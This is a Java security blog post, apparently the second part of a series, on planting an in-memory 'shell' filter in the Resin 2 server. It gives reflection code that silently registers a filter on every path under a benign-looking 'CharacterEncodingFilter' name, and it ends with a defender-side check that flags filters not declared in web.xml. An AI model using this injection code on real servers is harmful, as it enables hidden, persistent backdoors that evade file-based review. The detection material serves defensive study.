Java Security: Resin 2 Memory Shell (Part 2)


After that, it can simply be added directly.

Main code:

    // filterName, APPLICATION, getClazz() and getFV() are members of the
    // enclosing class and are not shown in this part.
    private static void doInject() {
        filterName = "CharacterEncodingFilter-" + System.nanoTime();
        try {
            if (APPLICATION != null) {
                // Regexp
                //Class RegexpClazz = getClazz("com.caucho.regexp.Regexp");
                //Constructor RegexpConstructor = RegexpClazz.getDeclaredConstructor(String.class);
                //Object regexpObj = RegexpConstructor.newInstance("^(?=/)|^$");

                // QFilterConfig
                Class QFilterConfigclazz = getClazz("com.caucho.server.http.QFilterConfig");
                Constructor QFilterConfigConstructor = QFilterConfigclazz.getDeclaredConstructor(
                        getClazz("com.caucho.server.http.Application"),
                        String.class,
                        String.class,
                        getClazz("com.caucho.util.RegistryNode"));
                QFilterConfigConstructor.setAccessible(true);
                Object QFilterConfigObj = QFilterConfigConstructor.newInstance(
                        APPLICATION, filterName, "HiganbanaFilter", null);

                // FilterMap
                Class filterMapClazz = getClazz("com.caucho.server.http.FilterMap");
                Constructor filterMapConstructor = filterMapClazz.getDeclaredConstructor();
                filterMapConstructor.setAccessible(true);
                Object filterMap = filterMapConstructor.newInstance();

                // set FilterMap regexp
                Method setRegexpMethod = filterMap.getClass().getDeclaredMethod("setURLPattern", String.class, String.class);
                setRegexpMethod.setAccessible(true);
                setRegexpMethod.invoke(filterMap, "/*", null);

                // set FilterMap data
                Method setDataMethod = filterMap.getClass().getDeclaredMethod("setData", Object.class);
                setDataMethod.setAccessible(true);
                setDataMethod.invoke(filterMap, QFilterConfigObj);

                // add FilterMap 2 _filterMap
                ArrayList _filterMap = (ArrayList) getFV(APPLICATION, "_filterMap");
                _filterMap.add(filterMap);

                // add QFilterConfig 2 _filterList
                ArrayList _filterList = (ArrayList) getFV(APPLICATION, "_filterList");
                _filterList.add(QFilterConfigObj);

                // put QFilterConfig 2 _filters
                Hashtable _filters = (Hashtable) getFV(APPLICATION, "_filters");
                _filters.put(filterName, QFilterConfigObj);
            }
        } catch (Exception e) {}
    }

    private static void getApplication() {
        Thread thread = Thread.currentThread();
        ClassLoader contextClassLoader = thread.getContextClassLoader();
        Hashtable attributesObj1 = (Hashtable) getFV(contextClassLoader, "attributes");
        APPLICATION = attributesObj1.get("caucho.application");
    }

There is one drawback, however: while debugging the logic I found that the filter can only be added when a filter already exists in the current web.xml. This problem has not been solved yet.

Finally, this was a rather interesting and extreme problem that came up in a project, although this is not a very good solution either.
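A defender-side check for the injection shown above, added here as an example and not part of the original post: it compares a snapshot of the runtime filter registry (filter name to class name, as held in the `_filters` table the code writes to) against the filters declared in web.xml. The class name `FilterAudit`, the sample web.xml and the runtime snapshot are constructed for illustration; collecting the snapshot from a live server is assumed to happen elsewhere.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.*;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.*;

public class FilterAudit {
    // Parse the <filter> entries (filter-name -> filter-class) declared in web.xml.
    static Map<String, String> declaredFilters(String webXml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Old web.xml files carry a DOCTYPE: accept it, but never fetch DTDs or external entities.
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        Document doc = f.newDocumentBuilder()
                .parse(new ByteArrayInputStream(webXml.getBytes(StandardCharsets.UTF_8)));
        Map<String, String> out = new HashMap<>();
        NodeList filters = doc.getElementsByTagName("filter");
        for (int i = 0; i < filters.getLength(); i++) {
            Element e = (Element) filters.item(i);
            out.put(text(e, "filter-name"), text(e, "filter-class"));
        }
        return out;
    }

    static String text(Element e, String tag) {
        NodeList n = e.getElementsByTagName(tag);
        return n.getLength() == 0 ? "" : n.item(0).getTextContent().trim();
    }

    // Report runtime filters whose name or class is not backed by a web.xml declaration.
    static List<String> undeclared(Map<String, String> runtime, Map<String, String> declared) {
        List<String> findings = new ArrayList<>();
        for (Map.Entry<String, String> r : new TreeMap<>(runtime).entrySet()) {
            String want = declared.get(r.getKey());
            if (want == null) findings.add("UNDECLARED " + r.getKey() + " -> " + r.getValue());
            else if (!want.equals(r.getValue())) findings.add("CLASS-MISMATCH " + r.getKey() + " -> " + r.getValue());
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input: one declared filter, plus one runtime-only entry.
        String webXml = "<web-app><filter><filter-name>enc</filter-name>"
                + "<filter-class>com.example.EncFilter</filter-class></filter></web-app>";
        Map<String, String> runtime = new HashMap<>();
        runtime.put("enc", "com.example.EncFilter");
        runtime.put("CharacterEncodingFilter-1234567890", "HiganbanaFilter");
        undeclared(runtime, declaredFilters(webXml)).forEach(System.out::println);
    }
}
```

Because the injected entry exists only in memory, a filter name with no matching declaration on disk is the signal to investigate; the name alone is chosen to look benign.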
